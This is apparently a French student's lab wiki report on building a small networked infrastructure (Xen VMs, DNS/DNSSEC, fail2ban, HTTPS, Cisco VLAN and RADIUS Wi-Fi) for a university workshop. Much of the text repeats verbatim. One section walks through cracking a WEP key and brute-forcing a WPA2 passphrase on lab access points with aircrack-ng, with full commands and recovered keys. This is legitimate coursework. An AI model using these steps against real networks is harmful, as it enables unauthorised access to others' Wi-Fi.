De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-12T15:49:01Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>

accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-12T15:29:38Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
